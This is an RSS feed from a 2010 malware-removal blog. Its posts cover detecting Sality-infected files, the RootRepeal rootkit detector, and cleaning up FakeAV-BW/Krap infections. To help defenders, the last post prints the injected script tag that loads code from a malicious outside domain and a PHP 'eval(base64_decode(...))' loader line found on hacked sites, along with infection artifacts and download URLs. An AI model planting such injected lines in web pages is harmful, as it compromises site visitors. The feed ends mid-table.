<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Virus Experts - We Make Your Digital Life Secured &#187; Removal Tips,Tools and Videos</title>
	<atom:link href="http://www.virusexperts.org/category/removal-tips-tools-and-videos/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.virusexperts.org</link>
	<description>Virusexperts.org is about how to remove and protect you digital life from viruses,worms and spyware simply ( We make your digital life secured )</description>
	<lastBuildDate>Sat, 31 Jul 2010 22:10:13 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Tips to Detect Virus Files and Infected files</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/tips-to-detect-virus-files-and-infected-files/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=tips-to-detect-virus-files-and-infected-files</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/tips-to-detect-virus-files-and-infected-files/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 23:00:34 +0000</pubDate>
		<dc:creator>Rahulmg</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[BitDefender]]></category>
		<category><![CDATA[disinfection]]></category>
		<category><![CDATA[system]]></category>
		<category><![CDATA[technet microsoft]]></category>
		<category><![CDATA[Trojan]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2662</guid>
		<description><![CDATA[
How to detect virus files?
Virus files now a days are more improved and hard to find than earlier, now some files have nice icon so user cant imagine that file is virus or unwanted. Normal Properties of virus or infected files, that always tries to connect internet and get other unwanted softwares or files to [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/protection-tools/6-must-have-replacement-tools-when-fixing-a-computer-infected-by-virus/' rel='bookmark' title='Permanent Link: 6 Must Have Replacement Tools when Fixing a Computer Infected by Virus'>6 Must Have Replacement Tools when Fixing a Computer Infected by Virus</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-advanced-virus-remover-manually/' rel='bookmark' title='Permanent Link: Removal of Advanced Virus Remover (Manual)'>Removal of Advanced Virus Remover (Manual)</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-and-fix-virus-win32-sality-win32sality-ah-win32sality-ag-with-kaspersky-tools/' rel='bookmark' title='Permanent Link: How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools'>How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center"><img class="aligncenter" src="http://www.virusexperts.org/wp-content/uploads/HLIC/3e290f958ddf903915c155228db47c97.png" alt="Virus Experts Logo" width="187" height="190" /></p>
<h3>How to detect virus files?</h3>
<p style="text-align: justify">Virus files now a days are more improved and hard to find than earlier, now some files have nice icon so user cant imagine that file is virus or unwanted. Normal Properties of virus or infected files, that always tries to connect internet and get other unwanted softwares or files to the victims computer.</p>
<p style="text-align: justify"> </p>
<p style="text-align: justify">Some Trojan files like Sality.AA copies its file to windows\system32 with same file size, so it can identify easily, some may in hidden, and creates files in all folder with same name as folder. For Example, i have a folder in C:\myfolder, when this trojan infect the system, creates files in that folder with name myfolder.exe with size ~499 KB, if we open that file nothing opens but system will get busy. Like that so many files where created in those Drives and folders.</p>
<p style="text-align: justify"> </p>
<h3 style="text-align: justify">How To Delete these files:</h3>
<p style="text-align: justify">Use Windows Search utility or any alternative, before that find file size of file created, like myfolder.exe, if this filesize is 499 KB, add file size in Search parameter so you can easily delete all folder named execute files.</p>
<p style="text-align: justify"> </p>
<h3 style="text-align: justify">Note:</h3>
<p style="text-align: justify">If any exe file is running, you cannot delete some files, before that end those suspected file processess. You can use Windows Task Manager or any Alternative Task Processes lister like Process Explorer.<br />Get Process explorer from<br /><a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" target="_blank">http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx</a><br /><a href="http://en.wikipedia.org/wiki/Process_Explorer" target="_blank">http://en.wikipedia.org/wiki/Process_Explorer</a></p>
<p style="text-align: justify"> </p>
<p style="text-align: justify">From Process Explorer you can delete files, download this free program.</p>
<p style="text-align: justify"> </p>
<p style="text-align: justify">Detect Infected Virus Files.</p>
<p style="text-align: justify"> </p>
<p style="text-align: justify">To Detect infected files is simple. If you think your normal application tooks more time than normal, it may be the cause of virus infection. Bitdefender is the Best Antivirus software can be used in Disinfection of virus infected files.</p>
<p style="text-align: justify"> </p>
<p style="text-align: justify"> </p>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/protection-tools/6-must-have-replacement-tools-when-fixing-a-computer-infected-by-virus/' rel='bookmark' title='Permanent Link: 6 Must Have Replacement Tools when Fixing a Computer Infected by Virus'>6 Must Have Replacement Tools when Fixing a Computer Infected by Virus</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-advanced-virus-remover-manually/' rel='bookmark' title='Permanent Link: Removal of Advanced Virus Remover (Manual)'>Removal of Advanced Virus Remover (Manual)</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-and-fix-virus-win32-sality-win32sality-ah-win32sality-ag-with-kaspersky-tools/' rel='bookmark' title='Permanent Link: How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools'>How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/tips-to-detect-virus-files-and-infected-files/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>RootRepeal &#8211; The New and Great Rootkit Detector and Remover</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/rootrepeal-the-new-and-great-rootkit-detector/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rootrepeal-the-new-and-great-rootkit-detector</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/rootrepeal-the-new-and-great-rootkit-detector/#comments</comments>
		<pubDate>Mon, 31 May 2010 09:17:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[beta]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[driver scan]]></category>
		<category><![CDATA[rootkit]]></category>
		<category><![CDATA[rootkit detector]]></category>
		<category><![CDATA[rootkits]]></category>
		<category><![CDATA[RootRepeal]]></category>
		<category><![CDATA[ssdt]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2645</guid>
		<description><![CDATA[ 

RootRepeal is a new rootkit detector currently in public beta. 
 
It is designed with the following goals in mind:

Easy to use &#8211; a user with little to no computer experience should be able to use it.
Powerful &#8211; it should be able to detect all publicly available rootkits.
Stable &#8211; it should work on as many different [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/sophos-anti-rootkit-updated-download-it-for-free/' rel='bookmark' title='Permanent Link: Sophos Anti-Rootkit updated &#8211; download it for free'>Sophos Anti-Rootkit updated &#8211; download it for free</a></li>
<li><a href='http://www.virusexperts.org/security-news/android-rootkits-malware-on-your-smartphone/' rel='bookmark' title='Permanent Link: Android rootkits &#8211; malware on your smartphone'>Android rootkits &#8211; malware on your smartphone</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-advanced-virus-remover-manually/' rel='bookmark' title='Permanent Link: Removal of Advanced Virus Remover (Manual)'>Removal of Advanced Virus Remover (Manual)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"> </p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-2646" title="RRD" src="http://www.virusexperts.org/wp-content/uploads/2010/05/RRD.png" alt="" width="494" height="390" /></p>
<p style="text-align: center;"><strong>RootRepeal is a new rootkit detector currently in public beta. </strong></p>
<p style="text-align: justify;"> </p>
<h3 style="text-align: justify;">It is designed with the following goals in mind:</h3>
<ol style="text-align: justify;">
<li>Easy to use &#8211; a user with little to no computer experience should be able to use it.</li>
<li>Powerful &#8211; it should be able to detect all publicly available rootkits.</li>
<li>Stable &#8211; it should work on as many different system configurations as possible, and, in the event of an incompatibility, not crash the host computer.</li>
<li>Safe &#8211; it will not use any rootkit-like techniques (hooking, etc.) to protect itself.</li>
</ol>
<p> </p>
<h3 style="text-align: justify;">Currently, RootRepeal includes the following features:</h3>
<ol style="text-align: justify;">
<li>Driver Scan &#8211; scans the system for kernel-mode drivers.  Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver&#8217;s file is visible on-disk.</li>
<li>Files Scan &#8211; scans any fixed drive on the system for hidden, locked or falsified* files.</li>
<li>Processes Scan &#8211; scans the system for processes.  Displays all processes currently running, and shows if a processes is hidden or locked.</li>
<li>SSDT Scan &#8211; shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked. </li>
<li>Stealth Objects Scan &#8211; attempts to determine if any rootkits are active by looking for typical symptoms.</li>
<li>Hidden Services Scan &#8211; scans for hidden system services.</li>
<li>Shadow SSDT Scan &#8211; counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.</li>
</ol>
<p style="text-align: justify;">* &#8211; falsified files are files which have their size mis-reported to the Windows API.  Some rootkits use this to hide data.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">RootRepeal is currently in public beta.  Whereas every effort has been made to ensure compatibility with every system configuration on Windows 2000, XP, 2003 and Vista, it cannot be guaranteed.  There is always some risk when scanning for rootkits.  Before running RootRepeal, please make sure you have backups of all important data and have saved all open documents.</p>
<p style="text-align: justify;"> </p>
<h3>System Requirements</h3>
<ul>
<li>Microsoft® Windows 2008 Server; Windows Vista®; Windows XP Professional or Home Edition; Windows 2000 with Service Pack 4; Windows 2003 Server<br />Note: Only x86 versions of Windows are supported.</li>
<li>128MB of RAM.</li>
<li>600KB of hard-drive space.</li>
</ul>
<p> </p>
<p><strong>Download: <a rel="nofollow" href="http://ad13.geekstogo.com/RootRepeal.rar">RootRepeal.rar</a></strong><br />MD5 (of the EXE): 880D7A26B7BB6B00A0709E75F149B83D<br />SHA-1 (of the EXE): 1943798277BBB1C396A980C58D077F5A57636932</p>
<p> </p>
<p><strong>VirusTotal Scan:</strong> <a rel="nofollow" href="http://www.virustotal.com/analisis/dd2d8492185ded564fdae8f5a1d85946123c346086763a238b0d74f1e2848259-1250214648">http://www.virustotal.com/analisis/dd2d8492185ded564fdae8f5a1d85946123c346086763a238b0d74f1e2848259-1250214648</a></p>
<p> </p>
<p style="text-align: justify;"><strong><span style="color: #ff0000;">NOTE : </span>Because, as mentioned above, there is always an element of risk when scanning for rootkits, the author offers NO WARRANTY for RootRepeal.  USE AT YOUR OWN RISK!</strong></p>
<p style="text-align: justify;"><strong><br /></strong></p>
<p>The latest version of RootRepeal can always be found at the static links <a href="http://rootrepeal.googlepages.com/RootRepeal.rar">http://rootrepeal.googlepages.com/RootRepeal.rar</a>, or <a href="http://sites.google.com/site/rootrepeal/RootRepeal.zip">http://rootrepeal.googlepages.com/RootRepeal.zip</a> (see below for more mirrors, in case the bandwidth limits have been exceeded).</p>
<p> </p>
<p>Note: This site has recently been exceeding bandwidth, so if any of the above download links are unavailable, please use one of the following:</p>
<p><a rel="nofollow" href="http://ad13.geekstogo.com/RootRepeal.zip">http://ad13.geekstogo.com/RootRepeal.zip</a> <br /><a rel="nofollow" href="http://ad13.geekstogo.com/RootRepeal.rar">http://ad13.geekstogo.com/RootRepeal.rar</a> <br /><a rel="nofollow" href="http://rootrepeal.psikotick.com/RootRepeal.zip">http://rootrepeal.psikotick.com/RootRepeal.zip</a> <br /><a rel="nofollow" href="http://rootrepeal.psikotick.com/RootRepeal.rar">http://rootrepeal.psikotick.com/RootRepeal.rar</a></p>
<p> </p>
<p><strong>For more info about this project :  <a href="http://sites.google.com/site/rootrepeal/" target="_blank">http://sites.google.com/site/rootrepeal/</a></strong></p>
<p><strong><br /></strong></p>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/sophos-anti-rootkit-updated-download-it-for-free/' rel='bookmark' title='Permanent Link: Sophos Anti-Rootkit updated &#8211; download it for free'>Sophos Anti-Rootkit updated &#8211; download it for free</a></li>
<li><a href='http://www.virusexperts.org/security-news/android-rootkits-malware-on-your-smartphone/' rel='bookmark' title='Permanent Link: Android rootkits &#8211; malware on your smartphone'>Android rootkits &#8211; malware on your smartphone</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-advanced-virus-remover-manually/' rel='bookmark' title='Permanent Link: Removal of Advanced Virus Remover (Manual)'>Removal of Advanced Virus Remover (Manual)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/rootrepeal-the-new-and-great-rootkit-detector/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware/#comments</comments>
		<pubDate>Sun, 09 May 2010 17:02:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[adware]]></category>
		<category><![CDATA[FAKEAV]]></category>
		<category><![CDATA[FakeAV-BW]]></category>
		<category><![CDATA[fix]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Removal]]></category>
		<category><![CDATA[Removal Tools]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[virusexperts.org]]></category>
		<category><![CDATA[websites]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2494</guid>
		<description><![CDATA[ 
 

 
 
 
 

 
Severity Level : 8/10
 
Alias:

 Mal/FakeAV-BW [Sophos]
Generic FakeAlert!hr [McAfee]
Packed.Win32.Krap.an [Kaspersky Lab]
NOT Detected [Microsoft]

 
packupdate_build107_302.exe VirusTotal Report : (Click Here)
 
 
Infected Websites
This Malware is coming  from  infected website most of them hosted by GoDaddy, they Tweeted about this matter (http://twitter.com/GoDaddy/status/13199601776).
When the site got infected you will see the following line inserted just before the &#60;/body&#62; tag  in the [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware'>Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-suspect-1be4800a5bf6f6-malfakeav-bw-ave-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware'>Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm/' rel='bookmark' title='Permanent Link: Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM'>Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"> </p>
<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"> </p>
<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"><img class="aligncenter size-full wp-image-2500" title="Packed.Win32.Krap.an" src="http://www.virusexperts.org/wp-content/uploads/2010/05/Packed.Win32.Krap_.an_.png" alt="" width="250" height="250" /></p>
<p style="border: 0px none ; margin: 0px; padding: 0px; text-align: center;"><span id="PresenceContainer"><strong><br /></strong></span><span id="PresenceContainer"><strong> </strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span id="more-2494"></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong><span style="color: #000000;">Severity Level :</span> 8/10</strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3><strong>Alias:</strong></h3>
<ul>
<li> Mal/FakeAV-BW <span style="color: #ff0000;"><strong>[Sophos]</strong></span></li>
<li>Generic FakeAlert!hr <span style="color: #ff0000;"><strong>[McAfee]</strong></span></li>
<li>Packed.Win32.Krap.an <strong><span style="color: #ff0000;">[Kaspersky Lab]</span></strong></li>
<li>NOT Detected<strong> <span style="color: #ff0000;">[Microsoft]</span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong><span style="color: #ff0000;">packupdate_build107_302.exe </span>VirusTotal Report : (<a href="http://www.virustotal.com/analisis/1b16a4c70c83b067c7cb2f6712967ce09c4a712b71408d69d2eb04c8dcf7e938-1273399479" target="_blank">Click Here</a>)</strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h2>Infected Websites</h2>
<p>This Malware is coming  from  infected website most of them hosted by GoDaddy, they Tweeted about this matter (<a class="bbc_url" title="External link" rel="nofollow external" href="http://twitter.com/GoDaddy/status/13199601776">http://twitter.com/GoDaddy/status/13199601776</a>).</p>
<p>When the site got infected you will see the following line inserted just before the &lt;/body&gt; tag  in the source of any of the PHP pages:</p>
<pre class="prettyprint lang-html"><span class="tag">&lt;script</span><span class="pln"> </span><span class="atn">src</span><span class="pun">=</span><span class="atv">"</span><a href="http://kdjkfjskdfjlskdjf.com/kp.php" class="broken_link"><span class="atv"><span><a href="http://kdjkfjskdfjlskdjf.com/kp.php">http://kdjkfjskdfjlskdjf.com/kp.php</a></span></span></a><span class="atv">"</span><span class="tag">&gt;&lt;/script&gt;</span></pre>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;">When you examine each of the PHP pages, you see this line at the top of all of them (The hacked code):</p>
<pre class="prettyprint"><span class="pun">&lt;?</span><span class="pln">php </span><span class="com">/**/</span><span class="pln"> </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">base64_decode</span><span class="pun">(</span><span class="str">"<strong><span style="color: #ff0000;">Random Code</span></strong>"</span><span class="pln"> </span><span class="pun">));?&gt;</span></pre>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;">When you decode this, it equates to:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"><a href="http://www.virusexperts.org/wp-content/uploads/2010/05/malware-code.png" target="_blank"><img class="aligncenter size-large wp-image-2495" title="malware code" src="http://www.virusexperts.org/wp-content/uploads/2010/05/malware-code-1024x680.png" alt="" width="461" height="305" /></a></p>
<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"> </p>
<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"> </p>
<h3 style="border: 0px none ; margin: 0px; padding: 0px;">Remove The hacked code from infected sites</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;">Search inside all <strong>index.php</strong> and <strong>*.php files </strong>for these codes and delete it :</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;">1-  <span class="tag">&lt;script</span><span class="pln"> </span><span class="atn">src</span><span class="pun">=</span><span class="atv">&#8220;</span><a href="http://kdjkfjskdfjlskdjf.com/kp.php" class="broken_link"><span class="atv"><span><a href="http://kdjkfjskdfjlskdjf.com/kp.php">http://kdjkfjskdfjlskdjf.com/kp.php</a></span></span></a><span class="atv">&#8220;</span><span class="tag">&gt;&lt;/script&gt;</span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;">2-  <span class="pun">&lt;?</span><span class="pln">php </span><span class="com">/**/</span><span class="pln"> </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">base64_decode</span><span class="pun">(</span><span class="str">&#8220;<strong><span style="color: #ff0000;">Random Code</span></strong>&#8220;</span><span class="pln"> </span><span class="pun">));?&gt;</span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><span class="Apple-style-span" style="border-collapse: separate; color: #000000; font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><span class="Apple-style-span" style="font-family: 'Trebuchet MS',Verdana,Arial,sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Removing that from all your index and PHP files should solve the problem.</span></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h2>Infected PCs With ( Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an )</h2>
<p> </p>
<h3>File System Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The following files were created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<ul>
<li><strong>%APPDATA%\My Security Engine</strong><strong>\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">Instructions.ini</span><br /></strong></li>
<li><strong>%APPDATA%\My Security Engine</strong><strong>\</strong><strong><span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">winupdate.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong></li>
<li><strong>%APPDATA%\</strong><strong>Microsoft\Internet Explorer\Quick Launch\<span style="color: #ff0000;"> My Security Engine.lnk</span></strong><strong><span style="color: #ff0000;"> </span></strong></li>
<li><strong>%USERPROFILE%\Desktop\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">My Security Engine.lnk</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">cb.drv</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">CLSV.dll</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">eb.dll</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">eb.exe</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">eb.sys</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">exec.exe</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">fan.dll</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">fix.dll</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">FW.dll</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">kernel32.exe</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">pal.dll</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">ppal.exe</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">snl2w.dll</span></strong></li>
<li><strong>%USERPROFILE%\Recent\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">tjd.sys</span></strong></li>
<li><strong>%USERPROFILE%\Start Menu\</strong><strong><span style="color: #ff0000;">My Security Engine.lnk</span></strong></li>
<li><strong>%USERPROFILE%\Start Menu\Programs\</strong><strong><span style="color: #ff0000;">My Security Engine.lnk</span></strong></li>
<li><strong>%ALLUSERSPROFILE%\Application Data\e5adcb6\<span style="color: #ff0000;">8654.mof</span></strong></li>
<li><strong>%ALLUSERSPROFILE%\Application Data\e5adcb6\<span style="color: #ff0000;">MSE.ico</span></strong></li>
<li><strong>%ALLUSERSPROFILE%\Application Data\e5adcb6\<span style="color: #ff0000;">MSe5ad.exe</span></strong></li>
<li><strong>%ALLUSERSPROFILE%\Application Data\e5adcb6\MSESys\<span style="color: #ff0000;">vd952342.bd</span></strong></li>
<li><strong>%ALLUSERSPROFILE%\Application Data\MSJMKE\<span style="color: #ff0000;">MSTSKDKCKE.cfg</span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong>Note: </strong></span></p>
<ul>
<li><strong>%system%</strong> is a variable that refers to the System folder. By default, this is <strong>&#8220;C:\Windows\System&#8221;</strong> (Windows 95/98/Me), <strong>&#8220;C:\Winnt\System32&#8243;</strong> (Windows NT/2000), or<strong> &#8220;C:\Windows\System32&#8243;</strong> (Windows XP).</li>
<li><strong>?</strong> = Random file name.</li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>Memory Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">There were new processes created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<table style="margin-bottom: 25px; height: 151px;" border="0" cellspacing="0" cellpadding="5" width="498">
<tbody>
<tr>
<td>
<h3>Process Name</h3>
</td>
<td>
<h3>Process Filename</h3>
</td>
</tr>
<tr>
<td style="text-align: center;"><strong><span style="color: #ff0000;">winupdate.exe</span></strong></td>
<td><strong>%APPDATA%\My Security Engine</strong><strong>\</strong><strong><span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">winupdate.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong><span style="color: #ff0000;"><strong> </strong></span></td>
</tr>
<tr>
<td style="text-align: center;"><strong><span style="color: #ff0000;">MSe5ad.exe</span></strong></td>
<td><strong>%ALLUSERSPROFILE%\Application Data\e5adcb6\<span style="color: #ff0000;">MSe5ad.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;"><br /></span></strong></td>
<td><strong><br /></strong><strong><span style="color: #ff0000;"> </span></strong></td>
</tr>
</tbody>
</table>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>The following Internet action was started (the retrieved bits are saved into the local file):</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<table style="margin-bottom: 25px; height: 125px;" border="0" cellspacing="0" cellpadding="5" width="545">
<tbody>
<tr>
<td>
<h3>URL to be downloaded</h3>
</td>
<td>
<h3>Filename for the downloaded bits</h3>
</td>
</tr>
<tr style="text-align: center;">
<td style="text-align: left;">
<p><strong><span style="color: #ff0000;"><span><a href="http://4-open-davinci.com">http://4-open-davinci.com</a></span></span></strong></p>
<p><strong><span style="color: #ff0000;"><span><a href="http://kdjkfjskdfjlskdjf.com/kp.php" class="broken_link">http://kdjkfjskdfjlskdjf.com/kp.php</a></span><br /></span></strong></p>
</td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
